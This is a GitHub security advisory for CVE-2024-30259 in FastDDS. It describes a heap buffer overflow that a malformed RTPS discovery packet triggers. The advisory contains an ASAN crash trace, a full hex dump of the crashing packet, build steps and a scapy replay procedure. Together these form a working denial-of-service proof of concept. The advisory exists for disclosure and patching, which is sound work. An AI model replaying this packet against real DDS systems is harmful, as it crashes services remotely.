Skip to content

Heap buffer overflow when publisher send malformed packet

High
EduPonz published GHSA-qcj9-939p-p662 May 13, 2024

Package

FastDDS

Affected versions

<= 2.14.0

Patched versions

2.14.1 / 2.13.5 / 2.10.4 / 2.6.8

Description

Summary

When publisher serving malformed RTPS packet, heap buffer overflow occurs on subscriber. These vulnerability can remotely crash FastDDS.

Details

Version

  • FastCDR commit 3c6195aefd11d46395caf7d8b29019b5ef5aaefd (HEAD -> master, origin/master, origin/HEAD, origin/2.1.x)
  • FastDDS commit e94c4b1 (HEAD -> 2.13.1, tag: v2.13.1, origin/2.13.1)
  • clang 11

When open sample subscriber, and publisher serve malformed RTPS packet, heap buffer overflow might be occurs when parsing malformed PID_RELIABILITY_ENABLED serializedData.

Here are ASAN detailed log:

$ ./DDSHelloWorldSubscriber
Starting subscriber.
=================================================================
==403754==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61100001a154 at pc 0x000000c2343c bp 0x7f28fcffa9b0 sp 0x7f28fcffa9a8
READ of size 4 at 0x61100001a154 thread T2
    #0 0xc2343b in eprosima::fastdds::dds::ParameterProperty_t::element_size(unsigned char const*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/include/fastdds/dds/core/policy/ParameterTypes.hpp:1070:25
    #1 0xc2343b in eprosima::fastdds::dds::ParameterProperty_t::second[abi:cxx11]() const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/include/fastdds/dds/core/policy/ParameterTypes.hpp:979:26
    #2 0xc2343b in eprosima::fastrtps::rtps::ParticipantProxyData::get_persistence_guid() const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:863:35
    #3 0x12843c4 in eprosima::fastrtps::rtps::EDPSimple::assignRemoteEndpoints(eprosima::fastrtps::rtps::ParticipantProxyData const&, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/endpoint/EDPSimple.cpp:773:52
    #4 0x124e214 in eprosima::fastrtps::rtps::PDPSimple::assign_low_level_remote_endpoints(eprosima::fastrtps::rtps::ParticipantProxyData const&, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/participant/PDPSimple.cpp:722:17
    #5 0x124e214 in eprosima::fastrtps::rtps::PDPSimple::assignRemoteEndpoints(eprosima::fastrtps::rtps::ParticipantProxyData*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/participant/PDPSimple.cpp:549:13
    #6 0x12548d6 in eprosima::fastrtps::rtps::PDPListener::process_alive_data(eprosima::fastrtps::rtps::ParticipantProxyData*, eprosima::fastrtps::rtps::ParticipantProxyData&, eprosima::fastrtps::rtps::GUID_t&, eprosima::fastrtps::rtps::RTPSReader*, std::unique_lock<std::recursive_mutex>&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:195:26
    #7 0x1253981 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:138:13
    #8 0x1a74add in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/reader/StatelessReader.cpp:371:31
    #9 0x1a77d86 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/reader/StatelessReader.cpp:640:18
    #10 0x1a98a46 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool)::$_2::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:220:25
    #11 0x1a98a46 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool)::$_2>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool)::$_2 const&) const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:720:17
    #12 0x1a98a46 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:223:5
    #13 0x1aa391b in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool) const /usr/lib/gcc/x86_64-linux-gnu/12/../../../../include/c++/12/bits/std_function.h:591:9
    #14 0x1aa391b in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*, eprosima::fastrtps::rtps::EntityId_t&, bool) const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:901:5
    #15 0x1a9b7a1 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:457:33
    #16 0xfc583b in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/network/ReceiverResource.cpp:135:14
    #17 0x1c4e354 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPChannelResource.cpp:79:33
    #18 0x1c506b2 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0::operator()() const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPChannelResource.cpp:49:17
    #19 0x1c506b2 in eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int)::'lambda'()::operator()() const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/threading.hpp:99:24
    #20 0x1c506b2 in void* eprosima::thread::ThreadProxy<eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int)::'lambda'()>(void*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/thread_impl/thread_impl_custom.hpp:56:9
    #21 0x7f2901894ac2 in start_thread nptl/./nptl/pthread_create.c:442:8
    #22 0x7f290192684f  misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

0x61100001a154 is located 0 bytes to the right of 212-byte region [0x61100001a080,0x61100001a154)
allocated by thread T2 here:
    #0 0x72ee82 in calloc /home/nnelson/Documents/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
    #1 0x7c9db1 in eprosima::fastrtps::rtps::SerializedPayload_t::reserve(unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/include/fastdds/rtps/common/SerializedPayload.h:174:28

Thread T2 created by T0 here:
    #0 0x71973a in pthread_create /home/nnelson/Documents/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:214:3
    #1 0xd8194c in eprosima::thread::start_thread_impl(int, void* (*)(void*), void*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/thread_impl/thread_impl_pthread.ipp:63:19
    #2 0x1c4d666 in eprosima::thread::thread<eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int)::'lambda'()>(int, eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0&&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/thread_impl/thread_impl_custom.hpp:88:23
    #3 0x1c4d666 in eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/threading.hpp:95:12
    #4 0x1c4d666 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPChannelResource.cpp:51:12
    #5 0x1b0c925 in eprosima::fastdds::rtps::UDPTransportInterface::CreateInputChannelResource(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastrtps::rtps::Locator_t const&, bool, unsigned int, eprosima::fastdds::rtps::TransportReceiverInterface*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPTransportInterface.cpp:233:50
    #6 0x1b0b891 in eprosima::fastdds::rtps::UDPTransportInterface::OpenAndBindInputSockets(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, bool, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPTransportInterface.cpp:207:34
    #7 0x11283f7 in eprosima::fastdds::rtps::UDPv4Transport::OpenInputChannel(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPv4Transport.cpp:338:19
    #8 0xfc449e in eprosima::fastrtps::rtps::ReceiverResource::ReceiverResource(eprosima::fastdds::rtps::TransportInterface&, eprosima::fastrtps::rtps::Locator_t const&, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/network/ReceiverResource.cpp:46:24
    #9 0xfbea5e in eprosima::fastrtps::rtps::NetworkFactory::BuildReceiverResources(eprosima::fastrtps::rtps::Locator_t&, std::vector<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource>, std::allocator<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource> > >&, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/network/NetworkFactory.cpp:101:25
    #10 0xfe514b in eprosima::fastrtps::rtps::RTPSParticipantImpl::createReceiverResources(eprosima::fastdds::rtps::LocatorList&, bool, bool, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:1730:38
    #11 0xfdb6a3 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:381:5
    #12 0xfe7cf5 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:479:7

SUMMARY: AddressSanitizer: heap-buffer-overflow /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/include/fastdds/dds/core/policy/ParameterTypes.hpp:1070:25 in eprosima::fastdds::dds::ParameterProperty_t::element_size(unsigned char const*)
Shadow bytes around the buggy address:
  0x0c227fffb3d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb3e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c227fffb3f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c227fffb400: 00 00 04 fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fffb420: 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa fa
  0x0c227fffb430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==403754==ABORTING
$ ^C

Here are malformed packet (TS + DATA)

0000   00 00 03 04 00 06 00 00 00 00 00 00 7b 3f 08 00   ............{?..
0010   45 00 01 fc 9c 4e 40 00 40 11 9e a0 7f 00 00 01   E....N@.@.......
0020   7f 00 00 01 8b 87 1c e8 01 e8 ff fb 52 54 50 53   ............RTPS
0030   02 03 01 0f 01 0f 39 78 fc 44 e9 f0 00 00 00 00   ......9x.D......
0040   09 01 08 00 00 ae ac 65 d9 cf 58 50 15 05 80 01   .......e..XP....
0050   00 00 10 00 00 01 00 c7 00 01 00 c2 00 00 00 00   ................
0060   01 00 00 00 00 03 00 00 15 00 04 00 02 03 00 00   ................
0070   16 00 04 00 01 0f 00 00 50 00 10 00 01 0f 39 78   ........P.....9x
0080   fc 44 e9 f0 00 00 00 00 00 00 01 c1 32 00 18 00   .D..........2...
0090   01 00 00 00 f6 1c 00 00 00 00 00 00 00 00 00 00   ................
00a0   00 00 00 00 82 cb 92 26 31 00 18 00 01 00 00 00   .......&1.......
00b0   f7 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00c0   82 cb 92 26 02 10 00 00 14 00 00 00 00 00 00 00   ...&............
00d0   58 00 04 00 3f 0c 0f 00 62 00 14 00 10 00 00 00   X...?...b.......
00e0   50 61 72 74 69 63 69 70 61 6e 74 5f 70 75 62 00   Participant_pub.
00f0   59 00 d8 00 04 00 00 00 11 00 00 00 50 41 52 54   Y...........PART
0100   49 43 49 50 41 4e 54 5f 54 59 50 45 00 00 00 00   ICIPANT_TYPE....
0110   07 00 00 00 53 49 4d 50 4c 45 00 00 1b 00 00 00   ....SIMPLE......
0120   66 61 73 74 64 64 73 2e 70 68 79 73 69 63 61 6c   fastdds.physical
0130   5f 64 61 74 61 2e 68 6f 73 74 00 00 2f 00 00 00   _data.host../...
0140   69 34 2d 67 6c 2d 74 6d 6b 35 39 30 34 2d 33 2e   i4-gl-tmk5904-3.
0150   61 64 2e 70 73 75 2e 65 64 75 3a 32 30 32 34 36   ad.psu.edu:20246
0160   31 30 34 32 33 38 31 39 31 34 31 31 32 30 00 00   10423819141120..
0170   1b 00 00 00 66 61 73 74 64 64 73 2e 70 68 79 73   ....fastdds.phys
0180   69 63 61 6c 5f 64 61 74 61 2e 75 73 65 72 00 00   ical_data.user..
0190   08 00 00 00 64 6d 72 36 35 34 32 00 1e 00 00 00   ....dmr6542.....
01a0   66 61 73 74 64 64 73 2e 70 68 79 73 69 63 61 6c   fastdds.physical
01b0   5f 64 61 74 61 2e 70 72 6f 63 65 73 73 00 00 00   _data.process...
01c0   07 00 00 00 33 34 35 33 34 30 00 00 01 00 00 00   ....345340......
01d0   80 01 38 00 01 00 00 00 f4 1c 00 00 00 00 00 00   ..8.............
01e0   00 00 00 00 00 00 00 00 7f 00 00 01 00 ae ac 65   ...............e
01f0   3d 42 76 51 01 00 00 00 00 00 00 00 e0 01 00 00   =BvQ............
0200   00 00 00 00 00 00 00 00 00 00 00 00               ............

PoC

Install Fast-DDS with given options

# I use clang11 with CFLAGS=-fsanitize=address, CXXFLAGS=-fsanitize=address
git clone https://github.com/eProsima/Fast-DDS.git -b 2.13.1
export FAST_DDS=$PWD/Fast-DDS
pushd $FAST_DDS
	cd src
	git clone --branch release-1.11.0 https://github.com/google/googletest.git googletest-distribution
	export GOOGLETEST=$PWD/googletest-distribution
	pushd $GOOGLETEST
		mkdir build
		cd build
		cmake .. -DCMAKE_INSTALL_PREFIX=/usr/local/ -DBUILD_SHARED_LIBS=OFF
		sudo cmake --build . --target install
		export LD_LIBRARY_PATH=/usr/local/lib/
		echo 'export LD_LIBRARY_PATH=/usr/local/lib/' >> ~/.bashrc
	popd
	mkdir ../build
	cd ../build
	cmake .. -DEPROSIMA_BUILD_TESTS=OFF -DSANITIZER=Address -DCMAKE_INSTALL_PREFIX=/usr/local/ -DBUILD_SHARED_LIBS=OFF -DEPROSIMA_BUILD=ON -DCMAKE_BUILD_TYPE=Release -DSECURITY=ON -DSHM_TRANSPORT_DEFAULT=OFF -DFASTDDS_STATISTICS=ON
	sudo cmake --build . --target install
popd

Build Project with process packet
https://drive.google.com/file/d/1Y2bGvP3UIOJCLh_XEURLdhrM2Sznlvlp/view?usp=sharing (Sorry for the external upload, github blocks file upload)

You can simple reproduce errors:

cd build
rm -rf *
cmake ..
make
./HelloWorldDDSExample

And publisher packet reply:

pip3 install scapy
python3 runner.py

# (Keep Pressing Enter for sending packets)

You can run runner.py several times, sometimes Heap buffer overflow occurs.

https://vimeo.com/907641887?share=copy

Impact

This can remotely crash any Fast-DDS process, potentially leading to a DOS attack

Severity

High
8.2
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

CVE ID

CVE-2024-30259

Weaknesses

Credits